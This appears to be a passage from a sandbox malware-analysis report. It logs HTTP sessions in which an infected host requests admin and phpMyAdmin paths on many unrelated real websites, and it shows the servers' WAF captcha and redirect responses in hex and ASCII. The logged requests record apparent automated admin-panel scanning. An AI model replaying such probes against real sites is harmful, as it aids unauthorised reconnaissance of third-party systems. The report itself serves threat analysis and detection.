3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/wp-admin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
403	192.168.2.6	64888	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.815819025 CET	169	OUT	GET /admin/ HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.002372026 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Length: 45174 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 56 69 73 69 74 6f 72 20 61 6e 74 69 2d 72 6f 62 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20 20 20 20 64 69 76 2c 0a 20 20 20 20 20 20 73 70 61 6e 2c 0a 20 20 20 20 20 20 61 70 70 6c 65 74 2c 0a 20 20 20 20 20 20 6f 62 6a 65 63 74 2c 0a 20 20 20 20 20 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 68 33 2c 0a 20 20 20 20 20 20 68 34 2c 0a 20 20 20 20 20 20 68 35 2c 0a 20 20 20 20 20 20 68 36 2c 0a 20 20 20 20 20 20 70 2c 0a 20 20 20 20 20 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 0a 20 20 20 20 20 20 70 72 65 2c 0a 20 20 20 20 20 20 61 2c 0a 20 20 20 20 20 20 61 62 62 72 2c 0a 20 20 20 20 20 20 61 63 72 6f 6e 79 6d 2c 0a 20 20 20 20 20 20 61 64 64 72 65 73 73 2c 0a 20 20 20 20 20 20 62 69 67 2c 0a 20 20 20 20 20 20 63 69 74 65 2c 0a 20 20 20 20 20 20 63 6f 64 65 2c 0a 20 20 20 20 20 20 64 65 6c 2c 0a 20 20 20 20 20 20 64 66 6e 2c 0a 20 20 20 20 20 20 65 6d 2c 0a 20 20 20 20 20 20 69 6d 67 2c 0a 20 20 20 20 20 20 69 6e 73 2c 0a 20 20 20 20 20 20 6b 62 64 2c 0a 20 20 20 20 20 20 71 2c 0a 20 20 20 20 20 20 73 2c 0a 20 20 20 20 20 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 73 6d 61 6c 6c 2c 0a 20 20 20 20 20 20 73 74 72 69 6b 65 2c 0a 20 20 20 20 20 20 73 74 72 6f 6e 67 2c 0a 20 20 20 20 20 20 73 75 62 2c 0a 20 20 20 20 20 20 73 75 70 2c 0a 20 20 20 20 20 20 74 74 2c 0a 20 20 20 20 20 20 76 61 72 2c 0a 20 20 20 20 20 20 62 2c 0a 20 20 20 20 20 20 75 2c 0a 20 20 20 20 20 20 69 2c 0a 20 20 20 20 20 20 63 65 6e 74 65 72 2c 0a 20 20 20 20 20 20 64 6c 2c 0a 20 20 20 20 20 20 64 74 2c 0a 20 20 20 20 20 20 64 64 2c 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"/> <title>Visitor anti-robot validation</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <style> html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd,
Feb 21, 2024 00:26:16.002449036 CET	1286	IN	Data Raw: 20 20 20 20 20 20 6f 6c 2c 0a 20 20 20 20 20 20 75 6c 2c 0a 20 20 20 20 20 20 6c 69 2c 0a 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 2c 0a 20 20 20 20 20 20 66 6f 72 6d 2c 0a 20 20 20 20 20 20 6c 61 62 65 6c 2c 0a 20 20 20 20 20 20 6c 65 67 65 6e Data Ascii: ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details,
Feb 21, 2024 00:26:16.002456903 CET	1286	IN	Data Raw: 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 43 61 6c 69 62 72 69 22 2c 20 52 6f 62 6f 74 6f 2c 0a 20 20 20 20 20 20 20 20 20 20 4f 78 79 Data Ascii: font-family: -apple-system, BlinkMacSystemFont, "Calibri", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 150%; } .page-container { background-color: transparent;
Feb 21, 2024 00:26:16.002469063 CET	1286	IN	Data Raw: 61 6c 65 72 74 20 70 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 70 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 Data Ascii: alert p { padding: 10px 0; } .page-container .captcha-container { margin-top: -20px; } @media screen and (min-width: 460px) { .page-container .captcha-container { padding: 10px 10px;
Feb 21, 2024 00:26:16.002480984 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 70 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 23 6d 6f 72 65 49 Data Ascii: font-weight: bold; } .page-container .captcha-container #moreInfoDropdown { font-size: 14px; text-align: center; color: #c40000; cursor: pointer; } .page-container .captcha-contai
Feb 21, 2024 00:26:16.002537012 CET	1286	IN	Data Raw: 74 65 72 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 65 6e 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 Data Ascii: ter; width: 100%; } .center { text-align: center; } .right { text-align: right; } .visible { display: block !important; } .invisible { display: none !i
Feb 21, 2024 00:26:16.002546072 CET	1286	IN	Data Raw: 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 64 61 70 74 69 76 65 43 6f 6c 6f 72 28 0a 20 20 20 20 20 20 20 20 68 65 78 2c 0a 20 20 20 20 20 20 20 20 64 61 72 6b 43 6f 6c 6f 72 20 3d 20 22 23 30 30 30 30 30 30 22 2c 0a 20 20 20 20 20 20 20 20 6c 69 67 Data Ascii: function adaptiveColor( hex, darkColor = "#000000", lightColor = "#FFFFFF" ) { if (hex.indexOf("#") === 0) { hex = hex.slice(1); } // convert 3-digit hex to 6-digits. i
Feb 21, 2024 00:26:16.002559900 CET	1286	IN	Data Raw: 20 6c c3 b6 73 65 6e 20 53 69 65 20 64 61 73 20 3c 62 3e 43 41 50 54 43 48 41 3c 2f 62 3e 20 75 6e 74 65 6e 2c 20 75 6d 20 77 65 69 74 65 72 20 7a 75 20 73 75 72 66 65 6e 20 75 6e 64 20 75 6e 73 20 62 65 69 20 64 65 72 20 42 65 6b c3 a4 6d 70 66 Data Ascii: lsen Sie das <b>CAPTCHA</b> unten, um weiter zu surfen und uns bei der Bekmpfung von Cyberkriminalitt zu helfen.", SUBMIT: "Lschen meiner IP", HEADING: "Warum ist das notwenig?", PRE_BODY: "Ihre IP Adresse",
Feb 21, 2024 00:26:16.002585888 CET	1286	IN	Data Raw: 42 4f 44 59 3a 20 22 59 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 50 4f 53 54 5f 42 4f 44 59 3a 0a 20 20 20 20 20 20 20 20 20 20 22 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 66 6f 72 20 73 65 63 75 72 69 Data Ascii: BODY: "Your IP address", POST_BODY: "has been blocked for security reasons.<br>Probably your IP address has been used for violation of server security rules before.<br>We have to make sure that this is not a malicious, automa
Feb 21, 2024 00:26:16.002635002 CET	1286	IN	Data Raw: 61 64 6f 72 20 73 65 61 20 75 6e 61 20 70 65 72 73 6f 6e 61 20 79 20 6e 6f 20 65 6c 20 73 6f 66 74 77 61 72 65 20 64 65 20 75 6e 20 48 61 63 6b 65 72 2e 20 50 6f 72 20 66 61 76 6f 72 20 72 65 6c 6c 65 6e 65 20 65 6c 20 43 61 70 74 63 68 61 2e 20 Data Ascii: ador sea una persona y no el software de un Hacker. Por favor rellene el Captcha. Al rellenar correctamente el Captcha, su IP actual, ser eliminada automticamente de nuestra lista de IP's maliciosas.", BEST_REGARDS: "Muchas Gracias
Feb 21, 2024 00:26:16.187666893 CET	1286	IN	Data Raw: 65 20 76 61 6c 69 64 c3 a9 20 c3 a0 20 74 72 61 76 65 72 73 20 6c 65 20 3c 62 3e 43 41 50 54 43 48 41 3c 2f 62 3e 2c 20 76 6f 74 72 65 20 61 64 72 65 73 73 65 20 49 50 20 73 65 72 61 20 73 75 70 70 72 69 6d c3 a9 65 20 64 65 20 6c 61 20 6c 69 73 Data Ascii: e valid travers le <b>CAPTCHA</b>, votre adresse IP sera supprime de la liste grise de BitNinja.", BEST_REGARDS: "Merci.", SIGNATURE: "L'quipe BitNinja", ACCESSING: "Ouverture", SECURELY: "en scurit

Session ID	Source IP	Source Port	Destination IP	Destination Port
404	192.168.2.6	64898	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.816827059 CET	169	OUT	GET /admin/ HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.998577118 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:15 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 38 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b Data Ascii: 58f<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![
Feb 21, 2024 00:26:15.998608112 CET	484	IN	Data Raw: 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a Data Ascii: ]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,
Feb 21, 2024 00:26:15.998620033 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
405	192.168.2.6	64389	223.29.45.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.838972092 CET	182	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.111006975 CET	463	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/phpMyAdmin/ Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
406	192.168.2.6	64989	208.109.43.169	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.850450993 CET	172	OUT	GET /pma/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.011609077 CET	435	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache Location: https://waukesha-water.com/pma/ Content-Length: 239 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 75 6b 65 73 68 61 2d 77 61 74 65 72 2e 63 6f 6d 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://waukesha-water.com/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
407	192.168.2.6	65186	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.868066072 CET	168	OUT	GET /admin HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.963259935 CET	218	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/admin ETag: "65d0dd59-0"
Feb 21, 2024 00:26:16.169492960 CET	218	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/admin ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
408	192.168.2.6	64889	23.236.62.147	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.868426085 CET	171	OUT	GET /admin.php HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.074892044 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/admin.php strict-transport-security: max-age=3600 x-wix-request-id: 1708471575.955735654534112007 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: dwc60INy8NFddnU/0WdlOB9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLuD79FmsOmndvPiE9seYA6YG/hKs8AeY1T4OIbgnD+yx,2d58ifebGbosy5xc+FRaln6J4JiBJvXCozo5dL3yXdRKJQQCZcKWPxNNUi/YRwXv7wPdjx+COtIqU0RAgYktTw== Data Raw: Data Ascii:
Feb 21, 2024 00:26:16.074937105 CET	260	IN	Data Raw: 32 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 4c 66 42 30 48 37 62 64 52 50 67 54 52 74 63 37 74 71 6e 4f 7a 70 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d 37 38 4f Data Ascii: 2UNV7KOq4oGjA5+PKsX47LfB0H7bdRPgTRtc7tqnOzpjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+CLIiD8kgg4qaApVirf92SI=,9n3wTMzaU7zAZzBAj7gVUwOZ8GUfIcrDrG391HVtVSz4D2PFRhC5HA4zrltzn4LTq/hWR+DDCXRX2HnNlbYrSw==Cache-Control: no-cacheX-Content-Type-Opt

Session ID	Source IP	Source Port	Destination IP	Destination Port
409	192.168.2.6	65156	62.210.211.126	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.927440882 CET	178	OUT	GET /pma/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.086755037 CET	553	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://voltage-distribution.com/pma/ Content-Length: 335 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC 